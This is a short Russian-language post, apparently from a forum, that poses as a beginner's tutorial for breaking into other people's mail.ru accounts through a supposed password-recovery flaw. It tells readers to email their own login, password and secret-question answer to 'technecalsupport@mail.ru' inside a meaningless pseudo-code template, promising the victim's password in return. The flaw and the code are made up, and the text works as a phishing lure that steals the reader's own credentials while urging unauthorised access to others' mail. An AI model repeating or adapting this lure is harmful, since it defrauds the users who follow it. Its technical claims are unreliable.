вот стало интересно ,это реально или нет?
Самоучитель для ламеров по взлому mail.ru
Как же всё-таки взломать чужую эл. почту на mail.ru?
Я давно пытался взломать взломать мыло на mail.ru, прочитал кучу статей по этому вопросу, но ожидаемого результата не нашёл. Ну какой резон каму-то платить чтобы по заказу взломали мыло, « и то, сто пудов надурят». Так вот я нашёл один эффективный способ!!
Так ну что начнём рассказ?
На mail.ru есть система восстановления пароля, именно при её создании разработчики допустили грандиозную ошибку:
Если прислать письмо на E-mail "technecalsupport@mail.ru" c именем ящика (логином), паролем на него и ответом на "секретный вопрос", а как неизвестное вписать какое-либо имя ящика (логин), находящегося на этом сервере, то робот пришлёт нам пароль на этот ящик (!!!).
А в чём же я напрягался?
Просто существует масса статей на этот счёт и многие хотят просто повысить рейтинг своих сайтов, а толку от их статей ни какого.
Так вот я перебрал все возможные коды и подобрал отличный код:
Нужно написать в теме письма Hackmail<Свой логин, логин жертвы>
< ? q_reppair=
$default-box: "имя_вашего_ящика_полностью";
$default-pass: "пароль_вашего_ящика";
$default-answ: "ответ_на_секретный_вопрос";
?a_reppair=
$unknown-box: "имя_ящика_пароль_которого_хотите_узнать";
$unknown-pass: "#take{array["bd_massive $pass_?"]
#unknown-pass}";
$CI: mail-box: "сюда_ещё_раз_имя_ящика_жертвы";
?>
Как же это получается взломать? Робот проверяющий данные проверяет “default-box”, “default-pass” и “default-answ”, если они соответствуют действительности, то он отправляет вам пароль от ящика, указанного вами в параметре “unknown-box”. Пароль должен придти в течение 24 часов, после отправки, (возможна задержка только при том если в этот день было послано много писем для восстановления пароля, просто создавали давненько mailробота).
Ну и как же написать письмо?
< ? q_reppair=
$default-box: "Denis999@mail.ru";
$default-pass: "12345";
$default-answ: "ответ на секретный вопрос";
?a_reppair=
$unknown-box: "fucka15@mail.ru";
$unknown-pass: "#take{array["bd_massive $pass_?"]”
#unknown-pass}";
$CI: mail-box: "fucka@mail.ru";
?>